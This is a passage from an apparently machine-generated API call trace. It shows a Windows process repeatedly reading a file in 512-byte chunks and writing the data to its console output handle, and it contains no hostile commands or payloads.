returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.060] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.060] ReadFile 
(in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.061] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.061] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 
lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, 
lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.062] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.062] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, 
lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.063] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.063] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0131.063] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] 
GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.064] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.064] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | 
out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, 
lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.065] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.065] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 
[0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.066] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) 
returned 1 [0131.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.066] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.066] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.067] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.067] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.067] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] 